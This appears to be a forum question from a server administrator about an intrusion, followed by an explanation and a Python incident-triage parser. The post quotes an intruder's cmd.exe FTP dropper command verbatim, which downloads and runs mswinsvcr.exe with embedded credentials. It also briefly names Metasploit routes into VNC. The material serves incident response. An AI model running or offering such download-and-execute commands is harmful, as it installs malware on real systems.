We have a UBUNTU 12.04 server in our company, which is remotely administered using Putty/ssh and TightVNC.
One day we realized an intruder had got a GUI login to the server, and was able to control the mouse to configure the Remote Desktop settings. A terminal window was also open and the following command was entered into it:-
“%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq &echo user 13302 30046 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq & mswinsvcr.exe &del eq”
3. There are three ways to exploit the VNC service with metasploit:-
i) msfpayload generated exe :- when executed on a windows machine then a remote desktop session can be initiated. But in our case this is a Linux machine so it is ruled out.
ii) malicious link generated with SET – Browsing the link results in a VNC session. This is also ruled out as no one has browsed any such links from the server.
iii) vnc_login auxiliary module of metasploit. An exhaustive password list is required. In our case we are using a strong alphanumeric password which is difficult to guess using a dictionary attack.
I have the following questions:-
First, what does the command mentioned above exactly do on a Linux machine?
How can a person get a remote GUI login to an Ubuntu machine without knowing the credentials?
Thanks in advance
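The command quoted in the post is Windows cmd.exe syntax: each echo appends one line to a helper script (eq), ftp -n -s:eq replays that script to connect, authenticate and fetch mswinsvcr.exe, the fetched file is then run, and the script is deleted. The following is an added example, not code from the original post: a small Python triage helper that pulls the FTP server, port, embedded credentials, fetched file names and the cleanup step out of such a command chain, so that an incident responder who finds the same string in shell history or a session log can record the indicators without re-running anything. The sample input is the command as the post shows it (with its 0.0.0.0 address); the class and function names are constructed for this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the two lines the post reports finding in the intruder's
# terminal window (address 0.0.0.0 is exactly as given in the post).
SAMPLE_COMMAND = (
    r"%systemroot%\system32\cmd.exe" "\n"
    "del eq&echo open 0.0.0.0 13643 >> eq &echo user 13302 30046 >> eq "
    "&echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq "
    "& mswinsvcr.exe &del eq"
)


@dataclass
class FtpDropperIndicators:
    """Artefacts recovered from an 'echo ... >> script & ftp -s:script' chain."""
    script_name: Optional[str] = None   # file the echoed FTP commands are written to
    ftp_script: Optional[str] = None    # script name handed to ftp -s:
    host: Optional[str] = None          # FTP server from the 'open' line
    port: Optional[int] = None
    username: Optional[str] = None
    password: Optional[str] = None
    files: List[str] = field(default_factory=list)     # names fetched with get/mget
    executed: List[str] = field(default_factory=list)  # fetched names later run
    script_deleted: bool = False        # 'del <script>' after the transfer
    matched: bool = False               # True when the full dropper shape is present


_ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.IGNORECASE)
_FTP_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.IGNORECASE)


def parse_ftp_dropper(cmdline: str) -> FtpDropperIndicators:
    """Extract indicators from a cmd.exe command chain; never executes anything."""
    ind = FtpDropperIndicators()
    # cmd.exe joins commands with '&'; newlines separate separately typed lines.
    parts = [p.strip() for p in re.split(r"[&\n]+", cmdline) if p.strip()]
    for p in parts:
        m = _ECHO_RE.match(p)
        if m:
            payload, target = m.group(1), m.group(2)
            ind.script_name = ind.script_name or target
            toks = payload.split()
            verb = toks[0].lower() if toks else ""
            if verb == "open" and len(toks) >= 2:
                ind.host = toks[1]
                if len(toks) >= 3 and toks[2].isdigit():
                    ind.port = int(toks[2])
            elif verb == "user" and len(toks) >= 2:
                ind.username = toks[1]
                ind.password = toks[2] if len(toks) >= 3 else None
            elif verb in ("get", "mget") and len(toks) >= 2:
                ind.files.append(toks[1])
            continue
        m = _FTP_RE.match(p)
        if m:
            ind.ftp_script = m.group(1)
            continue
        toks = p.split()
        head = toks[0].lower()
        if head in (f.lower() for f in ind.files):
            ind.executed.append(toks[0])          # downloaded file is run directly
        elif head == "del" and ind.ftp_script and toks[1:] == [ind.ftp_script]:
            ind.script_deleted = True              # helper script removed afterwards
    ind.matched = (
        ind.ftp_script is not None
        and ind.ftp_script == ind.script_name
        and ind.host is not None
        and bool(ind.files)
    )
    return ind


def triage_summary(ind: FtpDropperIndicators) -> List[str]:
    """Findings an incident responder would want in the case notes."""
    if not ind.matched:
        return ["no FTP-script dropper pattern found"]
    notes = [f"FTP dropper: connects to {ind.host}:{ind.port or 21}"]
    if ind.username:
        notes.append(f"credentials embedded in script: user={ind.username}")
    for f in ind.files:
        notes.append(f"downloads {f}" + (" and executes it" if f in ind.executed else ""))
    if ind.script_deleted:
        notes.append(f"deletes helper script {ind.script_name} afterwards (anti-forensics)")
    return notes


if __name__ == "__main__":
    for line in triage_summary(parse_ftp_dropper(SAMPLE_COMMAND)):
        print(line)
```

The host, port and file name are the values worth blocking at the firewall and searching for across other hosts; the embedded FTP credentials are useful only for correlating with other incidents, not for connecting back.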